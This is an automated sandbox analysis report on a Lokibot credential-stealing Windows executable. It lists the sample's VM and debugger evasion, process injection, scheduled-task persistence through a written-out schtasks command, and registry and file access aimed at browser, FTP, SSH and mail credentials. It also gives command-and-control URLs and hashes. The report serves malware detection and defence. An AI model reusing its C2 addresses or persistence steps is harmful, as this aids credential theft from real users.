                Source: 2CW1YLhNIS.exe, 00000000.00000002.648822995.000000000113F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: 2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_0040317B mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00402B7C GetProcessHeap,RtlAllocateHeap,
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeMemory written: C:\Users\user\Desktop\2CW1YLhNIS.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UieOsrSocP' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D57.tmp'
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeProcess created: C:\Users\user\Desktop\2CW1YLhNIS.exe C:\Users\user\Desktop\2CW1YLhNIS.exe
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Users\user\Desktop\2CW1YLhNIS.exe VolumeInformation
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: 4_2_00406069 GetUserNameW,
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                barindex
                Yara detected LokibotShow sources
                Source: Yara matchFile source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 6172, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 5768, type: MEMORY
                Source: Yara matchFile source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Tries to harvest and steal ftp login credentialsShow sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file access)Show sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to steal Mail credentials (via file registry)Show sources
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: PopPassword
                Source: C:\Users\user\Desktop\2CW1YLhNIS.exeCode function: SmtpPassword
                Source: Yara matchFile source: 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.650407522.0000000003D19000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 2CW1YLhNIS.exe PID: 6172, type: MEMORY
                Source: Yara matchFile source: 0.2.2CW1YLhNIS.exe.3de0b28.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.2CW1YLhNIS.exe.400000.0.raw.unpack, type: UNPACKEDPE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid AccountsScheduled Task/Job1Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection111Deobfuscate/Decode Files or Information1Input Capture1File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information4Credentials in Registry2System Information Discovery13SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSSecurity Software Discovery231Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol112SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion41Cached Domain CredentialsVirtualization/Sandbox Evasion41VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                2CW1YLhNIS.exe26%ReversingLabsWin32.Trojan.Pwsx
                2CW1YLhNIS.exe100%AviraHEUR/AGEN.1142734

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\UieOsrSocP.exe100%AviraHEUR/AGEN.1142734
                C:\Users\user\AppData\Roaming\UieOsrSocP.exe26%ReversingLabsWin32.Trojan.Pwsx

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                0.2.2CW1YLhNIS.exe.3de0b28.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                4.2.2CW1YLhNIS.exe.c90000.1.unpack100%AviraHEUR/AGEN.1142734Download File
                4.2.2CW1YLhNIS.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.2CW1YLhNIS.exe.8f0000.0.unpack100%AviraHEUR/AGEN.1142734Download File
                0.0.2CW1YLhNIS.exe.8f0000.0.unpack100%AviraHEUR/AGEN.1142734Download File
                4.0.2CW1YLhNIS.exe.c90000.0.unpack100%AviraHEUR/AGEN.1142734Download File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://63.141.228.141/32.php/QQojJUjm8ByeT0%Avira URL Cloudsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://63.141.228.141/32.php/QQojJUjm8ByeTtrue
                • Avira URL Cloud: safe
                unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name2CW1YLhNIS.exe, 00000000.00000002.649270975.0000000002D11000.00000004.00000001.sdmpfalse
                  high
                  http://www.ibsensoftware.com/2CW1YLhNIS.exe, 2CW1YLhNIS.exe, 00000004.00000002.660256282.0000000000400000.00000040.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css2CW1YLhNIS.exe, 00000000.00000002.649327645.0000000002D91000.00000004.00000001.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    63.141.228.141
                    unknownUnited States
                    33387NOCIXUStrue

                    General Information

                    Joe Sandbox Version:32.0.0 Black Diamond
                    Analysis ID:438541
                    Start date:22.06.2021
                    Start time:18:22:18
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 6m 12s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:2CW1YLhNIS (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@6/6@0/1
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 72.8% (good quality ratio 69.9%)
                    • Quality average: 76.9%
                    • Quality standard deviation: 28.6%
                    HCA Information:
                    • Successful, ratio: 99%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Stop behavior analysis, all processes terminated
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/438541/sample/2CW1YLhNIS.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    18:23:04API Interceptor2x Sleep call for process: 2CW1YLhNIS.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    63.141.228.141scanbuild-pdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/hVjgJl5jKemRQ
                    proformapdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/hVjgJl5jKemRQ
                    PEMBAYARAN COPY TT_PDF.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/fn1ToJTMzu3Td
                    YNNRmYhVl9.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/S4wFP8QBww9Tp
                    nueva cotizaci#U00f3n.PDF.bat.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/a1NQk98eWCWX2
                    Confirmation Note.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/5mGrB9x77E21g
                    Iywwij0cboJSMRU.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/nGBv5iZqdfzrl
                    SecuriteInfo.com.Trojan.Win32.Save.a.1333.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/3LJAZguIGMmJV
                    o8jhgzsjD1jQsHo.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/nGBv5iZqdfzrl
                    Purchase Order-020POR040557 (2).exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/DoGLQLrii1o27
                    HSBCpayment_advice.pdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/5l0ZnNa7AB6Dl
                    SCAN files.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/3LJAZguIGMmJV
                    pdf.zip.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/YjfkU88ZV6lc0
                    fW8OKRxAMYlXtGW.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/nGBv5iZqdfzrl
                    pdf.zip.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/YjfkU88ZV6lc0
                    RFQ For June 2021.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/fhAq3ugeI7NI8
                    MqaRnuUlL4etOtz.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/nGBv5iZqdfzrl
                    Purchase Order-020POR040557 (2).exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/vkuep8Jt3rHQ5
                    BtLe7XbewiWhuoD.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/8400chmGujESe
                    V8tgawp0z3hIiWB.exeGet hashmaliciousBrowse
                    • 63.141.228.141/32.php/qB0GQ2GKLyuOU

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    NOCIXUSscanbuild-pdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    proformapdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    PEMBAYARAN COPY TT_PDF.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    YNNRmYhVl9.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    nueva cotizaci#U00f3n.PDF.bat.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    Confirmation Note.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    Iywwij0cboJSMRU.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    SecuriteInfo.com.Trojan.Win32.Save.a.1333.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    o8jhgzsjD1jQsHo.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    Purchase Order-020POR040557 (2).exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    HSBCpayment_advice.pdf.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    SCAN files.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    pdf.zip.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    fW8OKRxAMYlXtGW.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    pdf.zip.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    RFQ For June 2021.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    MqaRnuUlL4etOtz.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    Purchase Order-020POR040557 (2).exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    BtLe7XbewiWhuoD.exeGet hashmaliciousBrowse
                    • 63.141.228.141
                    V8tgawp0z3hIiWB.exeGet hashmaliciousBrowse
                    • 63.141.228.141

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2CW1YLhNIS.exe.log
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):1314
                    Entropy (8bit):5.350128552078965
                    Encrypted:false
                    SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                    MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                    SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                    SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                    SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                    C:\Users\user\AppData\Local\Temp\tmp9D57.tmp
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):1643
                    Entropy (8bit):5.171209003004209
                    Encrypted:false
                    SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGWtn:cbhK79lNQR/rydbz9I3YODOLNdq3/
                    MD5:C923D89D6474FE393E213E4D1A3090E4
                    SHA1:AA1DC430A3DA6B691E97DC55B2F8E5BBC68B2826
                    SHA-256:483F5360FA7519AF97EBB641E91ED9014A62693F1014540C85A0A5FDA6E3EC3F
                    SHA-512:C1EA31DD5860BF44427022764E448F3EA7F09548BE2BF9124B59F4CD79A827C64FE3D7094E5E768D39482AC576E1D92AC5CF0C4C29D54D62C8F457D1E00E1676
                    Malicious:true
                    Reputation:low
                    Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                    C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: 1
                    C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):598
                    Entropy (8bit):0.6390116820665388
                    Encrypted:false
                    SSDEEP:3:/lbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbq:4/g/g/g/g/g/g
                    MD5:80F54DC1616678F37E478AC064CEC423
                    SHA1:B8DB85EC31702B48B95A727092A38B446360FCA7
                    SHA-256:A3AD19CA6EA04695FCD30034EAF389235385F3FA283837316916AF0CDA09DCC0
                    SHA-512:6B3595E6C9B1EF62BBF5FA5716AFC09CF5025FB3E8B8906B773B37AE0EB6DB10A3DBC0392E681D9DDA72EDF6FB357679F9E2BC06B7857B11083A916FE0A2DEE5
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.
                    C:\Users\user\AppData\Roaming\UieOsrSocP.exe
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):1219072
                    Entropy (8bit):7.089897950228557
                    Encrypted:false
                    SSDEEP:12288:jvMXXIcXoiXXIcXo0XXIcXoJ1scLjkQnoBwE6DIQ4myILwpqtIEHwtefVNOaHGCd:4/hELjeuGtZqtIEQtwOaHGC+2ZZZD/2o
                    MD5:76AFCE42F708E6A32DC9D0E52F9F0336
                    SHA1:D7A3D05C161BCFDAFE6348D82672D011FC5B05CC
                    SHA-256:9E658EB8027169730EF306E2E3B145DD71C9D9F569CE7DD7C8264A0DFC114D87
                    SHA-512:DB66F324D80D2CBE1DC9B0FD7CCDEED896ED5E4E08C4E837542D27371AB05BEFDB43DFB46655EF725ABA3B3A6582BE908DA5A6D44BDDE7900977520EB355E3D9
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 26%
                    Reputation:low
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................z............... ........@.. ....................................@.................................P...W.................................................................................... ............... ..H............text....y... ...z.................. ..`.reloc...............|..............@..B.rsrc................~..............@..@........................H........@...X......$...T...|...........................................z.(......}.....( ...o!...}....*..*...0...........{......E............8...Z...u................*..}..... ].4S}......}.....*..}..... ..Q.}......}.....*..}......{.... Km.a}......}.....*..}..... ,...}......}.....*..}......{.... ..=.a}......}.....*..}..... ....}......}.....*..}..... "G.R}......}.....*..}.....*...{....*.s"...z.2.{.....W...*....0..<........{......3..{....( ...o!...3...}......+..s.......{....}..
                    C:\Users\user\AppData\Roaming\UieOsrSocP.exe:Zone.Identifier
                    Process:C:\Users\user\Desktop\2CW1YLhNIS.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: [ZoneTransfer]....ZoneId=0

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):7.089897950228557
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    • Win32 Executable (generic) a (10002005/4) 49.75%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Windows Screen Saver (13104/52) 0.07%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    File name:2CW1YLhNIS.exe
                    File size:1219072
                    MD5:76afce42f708e6a32dc9d0e52f9f0336
                    SHA1:d7a3d05c161bcfdafe6348d82672d011fc5b05cc
